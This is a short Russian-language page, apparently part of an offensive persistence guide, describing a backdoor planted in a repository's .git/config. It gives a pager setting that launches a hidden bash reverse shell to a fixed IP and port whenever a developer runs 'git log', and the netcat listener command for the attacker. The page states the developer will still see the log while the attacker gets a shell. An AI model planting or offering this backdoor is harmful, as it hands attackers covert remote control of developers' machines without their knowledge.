11 - Git config

В .git/config есть переменные среды, их можно настроить на выполнение вредоносных команд, когда должно произойти какое-либо действие. Для git log соответствует переменная среды GIT_PAGER.

// Правим .git/config
pager = nohup bash -c 'bash -i >& /dev/tcp/192.168.140.128/9010 0>&1' > /dev/null 2>&1 & ${PAGER:-less}

// На атакующем хосте поднимаем netcat 
nc -vln 9010

теперь когда разраотчик вызовет git log, он увидит лог, а мы получим шелл

Previous10 - Git hook Next12 - PAM backdoor

Last updated 8 months ago